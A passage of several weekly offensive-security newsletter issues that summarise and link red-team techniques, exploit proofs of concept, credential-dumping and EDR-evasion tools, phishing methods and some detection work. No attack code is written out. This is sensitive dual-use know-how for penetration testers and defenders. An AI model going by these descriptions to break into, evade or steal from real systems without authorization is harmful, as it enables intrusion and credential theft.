• Amazon devices will soon automatically share your Internet with neighbors. Many Amazon devices will start allowing other amazon devices owned by different customers to use their internet connection to connect back to Amazon. If you don't want to be part of the world's largest botnet, opt-out now or don't buy IoT devices that are thinly veiled tools of surveillance.
• Book Release: "Adversarial Tradecraft in Cybersecurity". Dan's book drops June 9th, and looks to be a great collection of techniques and tricks for both red and blue teams. This will be a must read for any CCDC or ProsVJoes competitors!
• M1ssing Register Access Controls Leak EL0 State. A register on the M1 chip can be read and written to by any process, enabling two pieces of malware on the same machine to communicate. Big deal? Probably not (there are much easier ways for malware to communicate on the same system), but it could allow malware in separate virtual machines to communicate.
• The Full Story of the Stunning RSA Hack Can Finally Be Told. Before "supply chain attack" was a buzzword, the Chinese were harvesting RSA seeds straight from the source. Despite the dramatic language, the operation wasn't all that novel. Phish a user, expand access, harvest data.

Techniques

• Zero-Day TCC bypass discovered in XCSSET malware. Dropping a malicious .app inside the folder of an app that was given screen recording permissions was enough to bypass Apple's protections and allow a malicious actor to take screenshots without the user approving the malware to do so. This was patched in macOS 11.4. PoC that captures 15 seconds of camera without asking if placed inside an app directory that has approved camera access (facetime, photobooth, etc): CaptureCam.
• Abusing and Detecting LOLBIN Usage of .NET Development Mode Features. With the right privileges, it is possible to modify the configuration for .Net binaries in system32 and (along with setting an environment variable) leverage them for application control bypass with managed assembly modification (depending on the solution), general DLL hijack/sideloading, and persistence.
• Step-by-step how to deanonymize emails on LinkedIn. With the Outlook integration (thanks to the Microsoft purchase of LinkedIn), anyone with an Outlook account and an intercepting proxy can leak the emails of users on LinkedIn (pro tip: check your privacy settings!).
• Detecting Rclone – An Effective Tool for Exfiltration. Ransomware gangs often pull large amounts of target data before encrypting a network, and this post looks into ways to detect this exfiltration hopefully in time to stop the encryption.
• TeamViewer Local Privilege Escalation Vulnerability. This is a writeup of a macOS privilege escalation in TeamViewer from 2020-11, but the technique may be applicable to other apps that run privileged helpers.
• Baking Mojolicious cookies. Much like JWT, the Perl web framework Mojolicious cookies can be cracked if predictable weak keys are used.
• The Attack Path Management Manifesto. The team at SpecterOps are masters of the Attack Path and this manifesto lays out their thinking.
• Abusing LNK "Features" for Initial Access and Persistence. LNK files can be set to run on a key shortcut and can be hidden. Writing an LNK file to the desktop from a macro and having the shortcut run a payload that injects a C2 tool and removes the LNK (restoring the shortcut) could gain stealthy initial access and the target would only notice one broken copy function. This has the added benefit of spawning your C2 loader as a child of explorer.exe naturally.

Tools and Exploits

• My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability. This is a detailed walk through of the development process of a heap-overflow for ESXi and the first public PoC for it (that I am aware of).
• 2.2.0 20210525 MSTSC Passwords is a new Mimikatz release that can dump plaintext RDP credentials without injection or a hooking. This technique was discussed in LWiS 2021-05-17.
• scanflow boasts a feature set similar to the likes of CheatEngine, with a simple command line interface. Utilizing memflow, scanflow works in a wide range of situations - from virtual machines, to dedicated DMA hardware.
• Microsoft-JSON-Web-Token-Extractor is a C# project to extract JSON Web Tokens from memory without dumping anything on disk to avoid detection by Endpoint Detection and Response. Check out the blog post for more information.
• Carbuncle is a tool for interacting with outlook interop during red team engagements. Not a new release, but 0.2 adds a lot of nice features. Be warned, depending on the setup this could cause a popup to be created for the user!
• InvisibilityCloak is a proof-of-concept obfuscation toolkit for C# post-exploitation tools. For more information check out the blog post.
• SharpUnhooker is a C# universal API unhooker - automatically unhook functions from ntdll.dll, kernel32.dll, user32.dll, and kernelbase.dll.
• wowInjector is a PoC to exploit the 32-bit thread snapshot of WOW64 to take over $RIP, inject & bypass AV.
• boobsnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.
• loginItemManipulator is an Objective-C tool to list, add, and remove login items for user's session and global loginitem lists for macOS.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• Skeletons in the IT Closet: Seven Common Microsoft Active Directory Misconfigurations that Adversaries Abuse. This post should be a checklist after initial access. Depending on your level of comfort in the network, some issues will be easier to explore than others.
• bof-registry is a beacon object file for use with cobalt strike v4.1+. Supports querying, adding, and deleting keys/values of local and remote registries.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• VAN BUREN v. UNITED STATES. The CFAA cannot be used to prosecute rogue employees who have legitimate access to work-related resources (in this case police officer running unsanctioned database searches for money), which will need to be prosecuted under different charges. This adds weight to the 9th circuit court ruling that ToS violations are not a crime.
• Justice Dept. Claws Back $2.3M Paid by Colonial Pipeline to Ransomware Gang. The DOJ stated that the ransom payment "had been transferred to a specific address, for which the FBI has the 'private key,' or the rough equivalent of a password needed to access assets accessible from the specific Bitcoin address" which caused some to believe the FBI had either "cracked" Bitcoin (no) or seized a custodial wallet. I doubt the DarkSide crew is foolish enough to use a US based custodial exchange, and therefore the logical answer is _someone_ shelled DarkSide and transferred the Bitcoin to an address the FBI happened to control.
• Updates to our policies regarding exploits, malware, and vulnerability research. GitHub resolves their policy update on exploits in a reasonable manner. "Dual-use" security research is allowed, but you can't use GitHub itself as part of an attack (i.e. use gists for C2) and as always it reserves the right to remove PoCs used in attacks.

Techniques

• 32 bits, 32 gigs, 1 click... Exploitation of a JavaScriptCore WebAssembly Vulnerability. This post examines a vulnerability in the WebAssembly subsystem of JavaScriptCore, the JavaScript engine used in WebKit and Apple Safari. The issue was patched in Safari 14.1.1. This vulnerability was discovered through source review and weaponized to achieve remote code execution. The post stops short of RCE via a kernel driver exploit, but the source code is available
• Retrieving AWS security credentials from the AWS console. If you can dump browser cookies you can now extract an AWS token to use in the CLI thanks to the new CloudShell and an undocumented API.
• I got 99 problems but my NAC ain´t one. Think your fancy 802.1x is going to stop a determined adversary? Think again. The start of the show is nac_bypass.
• Kerberos - A Domains Achille's Heel. Gives a good overview of Kerberos, Silver and Golden Tickets.
• Dynamic payload generation with mingw. This in-depth post explores cross-compilation of Windows binaries and shellcode on Linux using mingw64 and contains some nifty tricks - like how to pull shellcode from the .text section of an exe.
• Your Microsoft Teams chats aren’t as private as you think... This post includes a handy command pipeline to parse messages from a log file Teams stores on disk (unencrypted). There could be some good information in those chats (passwords, etc).
• XSS in the AWS Console. This post explores two instances of XSS in the AWS console. They are now fixed. It has everything you can ask for: 0days in AWS, a CSP bypass, and memes.

Tools and Exploits

• netkat is a netcat version using raw sockets to avoid iptables and/or other OS filtering mechanisms. This could come in handy if you land inside a container running with sufficient privileges to do network shenanigans.
• KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements. Be sure to check out Carbuncle and OutlookToolbox_v2 for more complete feature sets.
• PhishInSuits is a tool to automate OAuth device code phishing using verified apps with twilio powered phishing SMS messages.
• Conf-thief will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to. It allows you to use a dictionary/keyword search file to search all files in the target Confluence for potentially sensitive data. Check out the blog post: Stealing All of the Confluence Things.
• penelope is an advanced shell handler. Its main aim is to replace netcat as shell catcher during exploiting RCE vulnerabilities. It works on Linux and macOS and the only requirement is Python 3.
• transacted_hollowing is a PE injection technique, hybrid between Process Hollowing and Process Doppelgänging - as seen in the Osiris dropper. Check out the blog post for all the details.
• microsoftteams_getonly.profile is a C2 profile for Cobalt Strike that mimics the network traffic of Microsoft Teams. Be warned, Azure is now shutting down accounts that use domain fronting.
• payloadSecretary can be used to automatically type long base64 encoded payloads into restricted environments (VDI, Citrix, etc).
• CredManBOF is a BOF file to use with Cobalt Strike, dumping the credential manager by abusing the SeTrustedCredmanAccess Privilege. Original research was done by James Foreshaw and further information is located here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• BeaconHunter is a behavior based monitoring and hunting tool built in C# tool leveraging ETW tracing. Blue teamers can use this tool to detect and respond to potential Cobalt Strike beacons. Red teamers can use this tool to research ETW bypasses and discover new processes that behave like beacons.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• How Hackers Used Slack to Break into EA Games. Nothing crazy here, but the "just ask" principle works more often than not. Most people like to be helpful, and attackers can exploit that helpfulness for access if unchecked.

Techniques

• Decrypting VEEAM Passwords. Veeam is used in many organizations for critical systems backup (i.e. VMware virtual machines like DCs) and so the built in credential manager is a great red team target.
• Offensive Approach to Online Sandboxes #1 – ANY.RUN & Testing With MSP. The ANY.RUN sandbox is an amazing tool for quickly getting a handle on what a process does, but it doesn't make much of an effort to hide itself. This post gives good detail on how you can detect being run in an ANY.RUN sandbox, as well as a trick to extend the time you can run up to nearly 2 hours.
• Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1. Conor is an inspiration. Take the time to read his posts, even if it's to just motivate yourself to dig into hard problems - or to learn about the out-of-bounds read and kASLR bypass from low integrity, thats pretty cool too.
• Don't use commands, use code: the tale of Netsh & PortProxy. This kind of exploration and development is what separates good red teams from groups of people who know how to use tools. It also helps bypass solutions that signature the "easy" way to do things.
• Phishing for AWS credentials via AWS SSO device code authentication. As more things move to the cloud, this type of phishing will not only become more common, but more impactful. In this case, an attacker can pre-generate an AWS SSO link and send that to a user. The attacker then has an hour after the user authenticates to do whatever/persist/escalate.
• Active Directory forest trusts part 2 - Trust transitivity and finding a trust bypass. This post explores a way to exploit cross forest trusts by forging an entire domain, and includes some hidden gems along the way - like the use of Frida to patch in a different SID in lsass or the LsarLookupNames3 trick to get the SID of remote machine's local domain.
• Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes. When I talked about "fancy AI/ML" in my DEF CON talk this is what I had in mind. Using Zeek and ML for anomaly detections, JA3 hash outliers can be used as a data point to warrant more investigation (or not).
• Hiding your syscalls. In the cat and mouse game of hooking and direct syscalling, this is the next step (for the mouse). By reading a valid (unhooked) syscall instruction and then dynamically patching that address into stubs at runtime, this technique should bypass any static "uses-direct-syscalls" signatures. Code here. A similar method is used in FreshyCalls. Your move AV.
• Proxy Windows Tooling via SOCKS. What's the best way to keep from having a tool caught on target? Don't run it on target! This post goes over how to tunnel the most common windows tools using Proxifier.
• Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug. This old bug is only present in newer distributions because of how polkit was implemented in Debian and Debian forks (i.e. Ubuntu).
• Finding Privilege Escalation Vulnerabilities in Windows using Process Monitor. This method of finding privescs isn't "new" but that doesn't mean it isn't effective. Check out the filter here.

Tools and Exploits

• CVE-2021-33739-POC is an exploit for the Microsoft DWM Core Library Elevation of Privilege Vulnerability (Windows 10 1909 to 20H2 and Server Core 2004/20H2). You'll probably want to swap the included shellcode and test in a disposable VM!
• MonitorUI is a GUI for Objective-See's ProcessMonitor tool for macOS.
• Celeborn is a Userland API Unhooker developed for learning Windows APIs and Syscall implementations. It mainly detects and patches hooking instructions in NTDLL.dll file. Written in C, targeting Windows.
• Melkor is able to read .Net assemblies and encrypt them in memory using DPAPI with the CRYPTPROTECT_LOCAL_MACHINE flag. These assemblies are kept encrypted when they are at rest. On demand Melkor can decrypt the assemblies and execute methods from them in a separate AppDomain. Once execution finishes the AppDomain is unloaded and only the encrypted assembly remains in memory.
• SharpHook is inspired by the SharpRDPThief project. It uses various API hooks in order to output the desired credentials.
• WindowsPermsPoC is a simple PoC to demonstrate that is possible to write Non writable memory and execute Non executable memory on Windows. This is possible because of the way WriteProcessMemory works and the fact developers can disable DEP for their own programs. The end result is you can write and execute from READ_ONLY tagged memory. Only on windows...
• SharpTeamsDump is a .Net implementation of the research published here. Note that is extracts messages from a log file on disk, not by interacting with Teams itself.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• adalanche is a bloodhound-like active directory explorer written in Go. While it cannot ingest standard sharphound data, it does have its own collection mechanism.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Snowflake moving to stable in Tor Browser 10.5. This is an interesting solution for users in restrictive environments that uses volunteer browsers as WebRTC proxies for the initial bridge connection into the Tor network. The initial broker connection uses domain fronting on Azure, so this may not last very long (or will be forced to switch providers).
• Testing In-Headset VR Ads. Facebook buys occulus. Facebook puts ads in occulus VR. No one is surprised.
• Rocky Linux 8.4 Available Now. After Red Hat/CentOS was sold to IBM, predictably big blue cut support for the community supported CentOS and turned it into a rolling release (breaking lots of LTS promises in the process). The community responded and in just 7 months a stable replacement distro is available! The migrate2rocky makes moving from CentOS 8 to Rocky easy.

Techniques

• Certified Pre-Owned. This is a long post, and a longer whitepaper, but if you attack or defend Active Directory it's a must read. The number of ways you can misconfigure AD certificate services is pretty incredible, and despite being documented as dangerous, they are common (like unconstrained delegation). Lots of tooling is linked in the post, but there is also Invoke-Leghorn and Microsoft ADCS – Abusing PKI in Active Directory Environment.
• Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover. Just when you had enough AD for the week, Whisker drops to make DACL-based attacks against User and Computer objects in Active Directory much easier. There are some caveats, like Windows Server 2016 Functional Level in Active Directory and at least one Windows Server 2016 Domain Controller with a digital certificate for server authentication installed, but with those fulfilled, account access becomes much easier than before thanks to Windows Hello for Business. Hello to new access.
• How I Found A Vulnerability To Hack iCloud Accounts and How Apple Reacted To It. Bug bounties can be great, but when the researcher and company can't agree on exploitability or severity, there can be bad blood. This research showed how an attacker could use a large number (28,000) of IP address to bypass rate limits and guess a 6 digit reset code for iCloud accounts.
• What you need to know about Process Ghosting, a new executable image tampering attack. By creating an executable as "DELETE PENDING," defender (and possibly other EDRs) will be unable to scan it and thus block execution. PoC here.
• Attackers Take Advantage of New Google Docs Exploit. This boils down to a fancy way to have your phishing pages hosted on docs.google.com, but it is likely effective none the less.
• Bypassing Image Load Kernel Callbacks. As EDRs move to kernel drivers, image load callbacks are what is being used to detect DLL loads. This library reimplements the Windows loader from scratch in userspace to prevent these callbacks from being sent to the kernel. Impressive stuff, and it can even load DLLs directly from memory - something the Windows loader cannot do. This library will likely be seen in any new loader or RAT going forward. Be sure to check out this llvm-obfuscator enabled fork as well.
• monday-cnc. Like any service with an API that can store and retieve data, planning site Monday.com can be used as a command and control channel. This write up includes a simple python PoC that could be adapted for use with C3 or Cobalt Strike's external C2.
• The Oddest Place You Will Ever Find PAC - Exploiting the notoriously unsafe gets() on a PAC-protected ARM64 binary. This is a walk through of bypassing pointer authentication (ARM 8.3 feature seen in iOS). The interactive features of the post are pretty amazing.
• Knock! Knock! The postman is here! (abusing Mailslots and PortKnocking for connectionless shells). The use of "reverse port knocking" by varying the source port is an interesting tactic, but like the post says, be wary of NATing or other network hops that will interfere with this.
• Click your shortcut and… you got pwned.. Up your adversary emulation game with this LNK generator and you too can be NOBELIUM.
• Introducing Striker and the Payload Automation Libraries. If you have multiple team servers and multiple payloads, the payload generation process can be painful unless automated. The python libraries introduced in this post can help you build your own pipeline.

Tools and Exploits

• bofnet_executeassembly. If you aren't using BOF.NET you are missing out. With this pull request, there is no excuse as you can drop in standard .NET assemblies and use them without any modification as a BOF. No more fork and run - opsec++. More details in this blog post.
• Polkit-exploit is a proof of concept for an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus (blog post in LWiS 2021-06-14).
• image-upload-exploits is a nice collection of ways to potentially leverage image uploads on web applications for data leaks or even shells!
• BloodCheck enables Red and Blue Teams to manage multiple Neo4j databases and run Cypher queries against a BloodHound dataset.
• Syscalls-Extractor is a script for automatically extracting syscall numbers for an OS.
• admin-login is a wordlist of potential admin panels for web app testing.
• brick is a small tool designed to identify potentially vulnerable SMM modules in a UEFI firmware image. It is comprised out of a collection of modules (implemented as IDAPython scripts), each responsible for identifying a specific vulnerability/anti-pattern in SMM code.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• malwarescarecrow is a tool designed to make physical devices detectable by malware and make system look like virtual machine.
• Real-Time-Voice-Cloning. This vishing (voice phishing) implications of this are scary. Imagine calling a supervisor to get audio samples, then using those to train the model and create a script to demand action on a phishing email from an employee. Demo here.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Introducing Windows 11. Despite saying Windows 10 would be the last version of windows, Microsoft's marketing team has won and Windows 11 will be released this fall. It still uses the NT 10 kernel, and Windows 10 1507 looks very different than Windows 10 21H2, so perhaps the numbered releases are good for users and developers both (avoids the "well it works on some windows 10"). There have been rumors of new utilities and mandatory Microsoft accounts, and taking steps against digital sovereignty with a TPM requirement. At least you can bypass the TPM check during install with these two registry modifications. Microsoft also made sure to take shots at Apple during the re-introduction of the Microsoft App Store which allows developers to bring their own "commerce engine" and keep 100% of their revenue.
• Microsoft signed a malicious Netfilter rootkit. This signed kernel driver was shipping traffic to a Chinese IP. I'll be interested in the result of Microsoft's internal investigation.
• Offensive Security exam retakes now $250. Offensive Security's training courses have long been "the standard" but as things change, newer, more relevant courses (like Red Team Ops, or PNPT) have come along to challenge the leader. Their recent moves to re-vamp their courses is good, but hiking retake prices has caused some backlash.
• Standing With Security Researchers Against Misuse of the DMCA. The Digital Millennium Copyright Act (DMCA) was outdated when it was passed in 2000, and in 2021 it makes even less sense. It's good the EFF is pushing the issue of security research before it becomes a bigger issue.
• Announcing a unified vulnerability schema for open source. Google has developed a JSON standard for vulnerabilities as well as site to browse them.
• VMware Patches Privilege Escalation Vulnerability in Tools for Windows. This sounds very similar to this Cisco Immunet LPE.
• Learning from our Myths. Possibly the most flexible open source C2 framework Mythic gets a big update with the 2.2 release which moves to React/GraphQL as well as implementing subtasks, an OPSEC engine, translation containers, and more.

Techniques

• Oracle VirtualBox VHWA Use-After-Free Privilege Escalation Vulnerability. A kernel driver in VirtualBox was vulnerable to a use after free bug which can be exploited from a custom Windows driver to achieve code execution on the VirtualBox host machine.
• CVE-2021-24084 An unpatched information disclosure in Microsoft Windows. The mobile device management log export feature of Windows fails to impersonate the user and is vulnerable to a mount point attack. PoC here.
• LEXSS: Bypassing Lexical Parsing Security Controls. This one is for the web app pentesters or bug bounty hunters. By using special HTML tags that leverage HTML parsing logic, it is possible to achieve cross-site scripting (XSS) even in instances where lexical parsers are used to nullify dangerous content.
• Spear Phishing Campaign with New Techniques Aimed at Aviation Companies. The VBS to drop XML and run msbuild aren't new, but the way the link was disguised in the HTML email to look like an attachment was pretty clever. Combine it with a trusted open redirect and you have a powerful pretext template.
• A supply-chain breach: Taking over an Atlassian account. This is an awesome web application hack that uses XSS, CSRF. a SameSite “Strict” bypass, HTTPOnly Bypass, and Cookie Fixation to go from a click to a full account takeover. PoC video here.
• Using CVE-2020-9971 to escape Microsoft Office’s app sandbox. This post shows a method of escaping the Office sandbox using XPC services

Tools and Exploits

• Ghidra 10.0. The first major public point release and is backwards compatible with projects created in 9.x (but 10.x created projects are not backwards compatible). This is also the first public release of the debugger! Check out What's New.
• SharpMailBOF is a BOF.NET program to split a file into smaller chunks and email it via a specified SMTP relay. Useful for getting large files (lsass dumps?) on slow networks using a different exfiltration method.
• compressedCredBandit is a modification to CredBandit that compresses the data (using MSZIP) before sending it back which should reduce the noise on the wire.
• AttackSurfaceAnalyzer is a tool from Microsoft to help you analyze your operating system's security configuration for changes during software installation. Run it on a base install, then install all the programs your target has, re-run it, profit?
• raccoon is a Salesforce object access auditor. For more information, check the blog post.
• CVE-2021-27850_POC is a critical unauthenticated remote code execution vulnerability that was found in all recent versions of Apache Tapestry. By downloading the AppModule.class file you can leak the HMAC secret key used to sign all the serialized objects in Apache Tapestry.
• CVE-2021-31955-POC. While perhaps not useful on its own, if you have another vulnerability and are waiting on a kernel information disclosure for Windows, this is a nice PoC.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• Legal Considerations when Gathering Online Cyber Threat Intelligence and Purchasing Data from Illicit Sources. This could be of interest if you deal in data breaches or other threat intelligence.
• jimi is an automation first no-code platform designed and developed originally for Security Orchestration and Response. Since its launch jimi has developed into a fully fledged IT automation platform which effortlessly integrates with your existing tools unlocking the potential for autonomous IT and Security operations.
• useful-forks aims at increasing the discoverability of useful forks of open-source projects. GitHubs fork view is nearly worthless to determine if a fork added anything to the code or not.
• WindowsBinaryReplacements is a nice collection of small Windows utilities in C#. These would make great "built in" commands for a custom C# rat.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• A New Kind of Ransomware Tsunami Hits Hundreds of Companies. REvil used certutil and MsMpEng.exe sideloading to great effect after compromising a popular managed service software provider.
• Telco injects ads into Google SMS 2FA Messages. If you needed any more ammo for why SMS 2FA is the worst kind of 2FA (but still much better than no 2FA!) here it is.
• How a Docker footgun led to a vandal deleting NewsBlur's MongoDB database. As someone who has dealt with UFW and Docker issues as well as a NewsBlur user I feel this post. TLDR: Docker will bypass UFW and its really hard to get them to work together.
• Windows 11 LPE tweeted. First blood?
• NSA, Partners Release Cybersecurity Advisory on Brute Force Global Cyber Campaign. Looks like the GRU is brute forcing public logins. This is your weekly reminder to force 2FA for all users.

Techniques

• Kaspersky Password Manager: All your passwords are belong to us. The silly UX prevented this poorly seeded password generator that causes every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second from being caught earlier. Or dons tinfoil hat maybe something else did...
• Taking over Uber accounts through voicemail. This is an attack enabled by the fact Uber will deliver OTP codes via audio to voicemail, and the fact that voicemail boxes are usually very easy to compromise. Ensure your scoping document allows for this type of attack before attempting, as multiple parties are involved.
• A Red Team Operation Leveraging a zero-day vulnerability in Zoom. Unpacking and adding payloads to legitimate installers is a nifty trick. Without complete verification of all files in an MSI this is possible, and the best part is these applications are likely allow-listed by AV/EDR or the SOC.
• An EPYC escape: Case-study of a KVM breakout. This post describes a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. This is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU.
• GateKeeper - Not a Bypass (Again). macOS' Gatekeeper alerts users when executing files that have been downloaded, but it doesn't alert on notarized dynamic library loads, even if they have the quarantine attribute set. How this be abused? Malicious screen savers, color picker plugins, preference panes etc can be used to execute arbitrary code from the internet without any warnings. Getting the files to the correct locations is an exercise left to the reader.
• BITS Persistence for Script Kiddies. This technique is likely monitored by EDR but is worth having in your tool bag none the less.
• gcp-dhcp-takeover-code-exec. By predicting the seed to the random number generator used by Debian's DHCP client, a malicious user with access to a VM in the same subnet of a rebooting VM can impersonate the metadata service and add a malicious ssh key to the victim VM. The practical implications of this are very limited, but it remains unpatched.
• Hunting for Windows “Features” with Frida: DLL Sideloading. DLL sideloading is an underutilized technique, but as it is hard to detect, advanced adversaries are using it. The new WFH tool uses Frida to identify potentially sideload-able DLLs in programs.
• Abusing Resource-Based Constrained Delegation (RBCD) using Linux. RBCD is a confusing misconfiguration present in some Active Directory environments. This post has both an offensive and defensive walkthrough.
• Merging C# Assemblies using dnMerge. This new C# assembly merge tool is a plugin for MSBuild that plays nicely with dotnet and uses LZMA for more efficient compression than Costura, allowing more tools to stay under the 1MB limit of Cobalt Strike's execute-assembly command.
• Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0. This in depth post digs into how the Sudo LPE works, what vCenter/Photon OS is, and how they adapted the exploit to work against vCenter 7.
• Exploit mitigations: keeping up with evolving and complex software/hardware. This projects aims to answer the question, "does my current environment have mitigation X?"
• How to exploit a vulnerable windows driver. AsRock took RWEverything, slapped some AES encryption (with hardcoded key) on the ioctl calls, and shipped it as a product. A quick overwrite of BeepDeviceControl and you have kernel execution.

Tools and Exploits

• PrintNightmare. The print spooler in Windows has a vulnerability that allows any domain user to install a print driver and achieve remote code execution.

  • Also check out the Impacket implementation which also includes a C# variant for local privilege escalation (or there is CVE-2021-1675-LPE).
  • Some testing has shown that domain controllers are vulnerable even after the June patch, possibly related to the "Point & Print" feature or perhaps "BuiltinPre-Windows 2000 Compatible Access".
  • Confused? Check this flow chart.
  • For detection this msp thread is great and there are free micropatches and a collection of resources on GitHub.
  • Official Microsoft Response

• ManuFuzzer is an LLVM-based binary, coverage-guided fuzzing framework for macOS . It is simple to integrate coverage-guided fuzzing with ManuFuzzer: just define a special function, update some build flags, and you have instant binary-only, coverage-guided fuzzing (only basic-block coverage). Using ManuFuzzer, you can instrument one or more selected frameworks for coverage and fuzz the target functions/library.
• Injector is a complete arsenal of memory injection and other techniques for red-teaming in Windows written in C#. This is a good base for writing your own loader, or testing EDR detections in a purple team scenario.
• pstf2 is an implementation of an HTTP server capable of passive browser fingerprinting to detect and block security scanning services from accessing hosted payloads.
• RelayRumbler is a proof-of-concept tool that attempts to retrieve the configuration from the memory dump of an F-Secure C3 Relay executable.
• PageTableInjection is a proof-of-concept of the page table injection technique to inject malicious code into the arbitrary user processes. Be sure to read "The Problem" section to understand stability issues.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• shutter. Not sure how I missed this gem. The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic. This is useful to blackhole event logging, defensive agent communication, or explicitly permit specific executables to communicate if they have been previously restricted by policy and runs totally in memory. How good is that expensive EDR if it can't call home?
• agentstub ssh agent forwarding is a big win for attackers with root on a compromised machine, and this tool illustrates some private key operations that can be done with the ssh-agent like signing files with RSA private keys.
• Vanara is set of .NET libraries for Windows implementing P/Invoke calls to many native Windows APIs with supporting wrappers. Use this to easily add P/Invoke calls to your next C# tool.
• PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic destined for one TCP port (e.g., 445/TCP) to another TCP port (e.g., 8445/TCP). PortBender includes an aggressor script that operators can leverage to integrate the tool with Cobalt Strike. However, because the tool is implemented as a reflective DLL, it can integrate with any C2 framework supporting loading modules through a "ReflectiveLoader" interface. Be aware this loads a driver, WinDivert64.sys.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Multiple U.S. States Sue Google for Violating Antitrust Laws With Play Store Fees. Last year Google said that all app developers would be required to use the Google Play Store payment system for in-app billing, which comes with a 30% cut to Google. What this means for Apple, who had a trail in May against Epic Games for the same issue (decision pending) remains to be seen.
• New privacy policy is completely unacceptable!. Audacity was bought by Muse Group (which owns Ultimate Guitar and MuseScore as well) and predictably want telemetry on the user base of their new toy or their lawyers slapped the boilerplate on it to cover all eventualities. Either way, there is now tenacity.
• Biden Sets Up Tech Showdown With ‘Right-to-Repair’ Rules for FTC. This battle has been brewing for a while as companies push harder against consumers actually owning, well, anything really. With pressure from the top, perhaps a set of FTC rules could give power back to the people and ensure that you do actually own what you buy and are free to modify and repair it on your own.
• DIVD-2021-00011 - Kaseya VSA Limited Disclosure. The Dutch CERT found and warned Kaseya about multiple vulnerabilities in April. Was the REvil exploit a case of parallel discovery, or perhaps a compromise of the Kaseya ticketing system?
• Microsoft Bug Bounty Programs Year in Review: $13.6M in Rewards. While that is a big number, the bug bounty community, and Microsoft specifically have been at the center of some bug bounty drama. Hopefully it encourages more researches to responsibly report vulnerabilities, and other companies to enact their own bug bounty programs.

Techniques

• Old dog, same tricks. Old "enterprise" software can be a gold mine for bugs. In this post a remote code execution vulnerability in Beagle Software’s ClockWatch is found and exploited. The vendor has declined to update, and thus this PoC should work forever (if you ever find ClockWatch in the wild).
• CVE-2021-28474: SharePoint Remote Code Execution via Server-Side Control Interpretation Conflict. After login, the site creation process leads to deserialization of untrusted user data and the ability to run arbitrary OS commands. This was patched in May 2021.
• Issue 2189: mpengine: asprotect embedded runtime dll memory corruption. An old, obscure packer format (asprotect) was emulated by executing an embedded DLL without signature checks. By creating a special asprotect DLL, RCE as SYSTEM on file scan is achievable. How many more obscure format unpackers lie in wait inside defender and similar products?
• Adding a native sniffer to your implants: decomposing and recomposing PktMon. Following the "write your own tools" mantra, this post explores PktMon and how to write your own packet sniffer using the built in "Packet Monitor" (Win 10/2019 1809+).
• Filesec.io. Stay up-to-date with the latest file extensions being used by attackers. It's the LOLBins or GTFObins of file extensions.
• Printnightmare Network Analysis. This is the kind of analysis that "open source tools" (OSTs) enable. This is a great post on how to break down pcaps to generate network signatures for new techniques/tools.
• Patching DoublePulsar to Exploit Windows Embedded Machines. This is a great example of not giving up on the first error, trying harder, and digging into issues to find solutions. Although an Windows Embedded support wasn't added to metasploit, the author got a shell and was able to continue the assessment.
• Process Creation is Dead, Long Live Process Creation — Adding BOFs Support to PEzor. This is the coolest tool of the last week. Run arbitrary executables as BOFs with a single command in Cobalt Strike. We have reached full BOF weaponization.

Tools and Exploits

• TokenTactics is an Azure JSON Web Token (JWT) manipulation toolset. Based on the work at AAD Internals, it adds the ability to pivot between token types, requiring (in certain setups) only one device code phish for wide access into Azure, Teams, Outlook, etc. The target inputs a code into a legitimate Microsoft page, but the codes are only good for 15 minutes.
• InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification needed. More information in the blog post.
• TeamsUserEnum will determine if an email is registered on teams or not. More details on immunIT's blog.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• rustpad is an efficient and minimal collaborative code editor, self-hosted, no database required. Consider this where you would have used Etherpad in the past.
• reconmap. This looks like a great tool to help operators collaborate on an external penetration test or red team engagement.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

